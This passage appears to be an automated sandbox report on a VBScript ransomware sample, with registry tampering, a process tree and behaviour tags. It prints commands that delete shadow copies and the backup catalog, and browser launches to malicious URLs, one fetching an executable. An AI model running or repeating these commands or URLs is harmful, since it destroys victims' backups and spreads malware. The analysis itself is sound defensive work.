Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\InactivityTimeoutSecs = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX.vbs" /elevated
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Blocks application from running via registry modification
  - Disables RegEdit via registry modification
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Modifies Control Panel
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:2980
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wbadmin delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:676
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:2728
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Windows\System32\iamthedoom.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1692
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1692 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2256
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2484
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2484 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1324
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:272
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1672
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1672 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2880
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1600
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1600 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1520
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1676
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1676 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3228
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2620
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2620 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2820
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:532
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:532 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:200
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2224
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2944
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2944 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2984
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1316
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1316 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3208
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2612
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2612 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3236
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer Phishing Filter
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2440
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2440 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3216
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2384
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2384 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3608
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:1492
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1832
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1832 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3644
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:1096
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1096 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3244
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:2948
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2948 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3200
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
      4⤵
      PID:2688
    - - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        5⤵
        
        PID:936
      - C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        6⤵
        
        PID:2632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        7⤵
        
        PID:3308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        8⤵
        
        PID:3560
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        9⤵
        
        PID:3832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        10⤵
        
        PID:3960
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        11⤵
        
        PID:4024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        12⤵
        
        PID:1040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        13⤵
        
        PID:3720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        14⤵
        
        PID:2220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        15⤵
        
        PID:3168
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        16⤵
        
        PID:1060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        17⤵
        
        PID:4016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        18⤵
        
        PID:2416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        19⤵
        
        PID:4628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        20⤵
        
        PID:4532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        21⤵
        
        PID:816
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        22⤵
        
        PID:3316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        23⤵
        
        PID:2492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        24⤵
        
        PID:4316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        25⤵
        
        PID:704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        26⤵
        
        PID:3488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        27⤵
        
        PID:4556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        28⤵
        
        PID:5096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        29⤵
        
        PID:5004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        30⤵
        
        PID:4976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        31⤵
        
        PID:4360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        32⤵
        
        PID:5160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        33⤵
        
        PID:5272
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        34⤵
        
        PID:5320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        35⤵
        
        PID:5404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        36⤵
        
        PID:5492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        37⤵
        
        PID:5564
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        38⤵
        
        PID:5612
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        39⤵
        
        PID:5684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        40⤵
        
        PID:5724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        41⤵
        
        PID:5768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        42⤵
        
        PID:5804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        43⤵
        
        PID:5840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        44⤵
        
        PID:5876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        45⤵
        
        PID:5912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        46⤵
        
        PID:5952
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        47⤵
        
        PID:5988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        48⤵
        
        PID:6024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        49⤵
        
        PID:6060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        50⤵
        
        PID:6096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        51⤵
        
        PID:6132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        52⤵
        
        PID:2064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        53⤵
        
        PID:5192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        54⤵
        
        PID:5264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        55⤵
        
        PID:5356
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        56⤵
        
        PID:5376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        57⤵
        
        PID:5444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        58⤵
        
        PID:5572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        59⤵
        
        PID:5544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        60⤵
        
        PID:5868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        61⤵
        
        PID:4368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        62⤵
        
        PID:5552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        63⤵
        
        PID:6188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        64⤵
        
        PID:6248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        65⤵
        
        PID:6284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        66⤵
        
        PID:6352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        67⤵
        
        PID:6396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        68⤵
        
        PID:6440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        69⤵
        
        PID:6504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        70⤵
        
        PID:6560
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        71⤵
        
        PID:6604
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        72⤵
        
        PID:6668
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        73⤵
        
        PID:6716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        74⤵
        
        PID:6784
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        75⤵
        
        PID:6828
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        76⤵
        
        PID:6876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        77⤵
        
        PID:6928
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        78⤵
        
        PID:6996
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        79⤵
        
        PID:7032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        80⤵
        
        PID:7084
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        81⤵
        
        PID:7140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        82⤵
        
        PID:6300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        83⤵
        
        PID:6304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        84⤵
        
        PID:6368
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        85⤵
        
        PID:6552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        86⤵
        
        PID:6472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        87⤵
        
        PID:6684
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        88⤵
        
        PID:6744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        89⤵
        
        PID:6836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        90⤵
        
        PID:7024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        91⤵
        
        PID:6968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        92⤵
        
        PID:6184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        93⤵
        
        PID:4268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        94⤵
        
        PID:6868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        95⤵
        
        PID:6804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        96⤵
        
        PID:3968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        97⤵
        
        PID:7196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        98⤵
        
        PID:7232
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        99⤵
        
        PID:7268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        100⤵
        
        PID:7308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        101⤵
        
        PID:7344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        102⤵
        
        PID:7380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        103⤵
        
        PID:7416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        104⤵
        
        PID:7452
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        105⤵
        
        PID:7488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        106⤵
        
        PID:7528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        107⤵
        
        PID:7572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        108⤵
        
        PID:7608
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        109⤵
        
        PID:7644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        110⤵
        
        PID:7680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        111⤵
        
        PID:7716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        112⤵
        
        PID:7752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        113⤵
        
        PID:7788
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        114⤵
        
        PID:7824
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        115⤵
        
        PID:7860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        116⤵
        
        PID:7896
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        117⤵
        
        PID:7932
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        118⤵
        
        PID:7968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        119⤵
        
        PID:8008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        120⤵
        
        PID:8052
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        121⤵
        
        PID:8088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        122⤵
        
        PID:8124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        123⤵
        
        PID:8160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        124⤵
        
        PID:7224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        125⤵
        
        PID:7520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        126⤵
        
        PID:7852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        127⤵
        
        PID:8152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        128⤵
        
        PID:8212
        
        C:\Windows\System32\wscript.exe
        
